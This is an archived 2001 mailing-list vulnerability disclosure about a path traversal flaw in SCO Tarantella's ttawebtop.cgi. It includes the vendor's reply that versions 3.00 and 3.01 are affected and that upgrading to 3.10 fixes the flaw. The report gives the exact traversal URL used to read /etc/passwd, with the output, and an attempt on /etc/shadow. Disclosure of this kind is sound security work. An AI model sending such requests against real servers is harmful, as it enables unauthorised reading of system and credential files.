On Monday June 18, KF wrote:
> SCO has been notified of this issue.
>
>
> -------- Original Message --------
> Subject: SCO Tarantella Remote file read via ttawebtop.cgi
> Date: Mon, 18 Jun 2001 13:06:41 -0400
> From: KF <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
>
>
>
>http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
>
> root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
> daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
> lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
> shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
> halt:x:7:0:halt:/sbin:/sbin/
> ...
>
>
> No perms to shadow...
>
>
>http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow
>
>
> File missing
>
> The following file could not be found:
>
>
> /tarantella/../../../../../../../../../../../../../../../etc/shadow
>
> Please give this information to a Tarantella Administrator.
>
> -KF
This problem was introduced in release 3.01 and was caught during a security
audit and was fixed for our last release (Tarantella 3.10).
It is a problem for releases 3.00 and 3.01 only.
To fix this problem upgrade to 3.10.
Thank you for reporting this problem.
- Mike McEwen
